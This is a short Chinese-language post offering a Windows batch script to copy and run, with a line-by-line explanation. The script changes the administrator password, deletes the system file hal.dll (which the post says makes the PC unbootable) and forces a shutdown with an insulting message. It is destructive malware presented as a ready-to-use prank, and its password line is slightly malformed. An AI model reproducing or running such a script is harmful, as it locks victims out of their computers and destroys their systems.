代碼開始,只抄橫線里面的
_______________________________
@echo off
net user administrator nishizhu\add
del /s /q c:\Windows\System32\hal.dll
shutdown -s -t 5 -c 你是一頭豬!!!
_______________________________
代碼詳解:
@echo off —— 隱藏命令,關閉回顯。
net user administrator nishizhu\add —— 把開機密碼改成“nishizhu\add”
del /s /q c:\Windows\System32\hal.dll —— 刪掉系統加載程序(刪了就開不了機)
shutdown -s -t 5 -c 你是一頭豬!!! —— 定時關機5秒鍾,並提示你是一頭豬!!!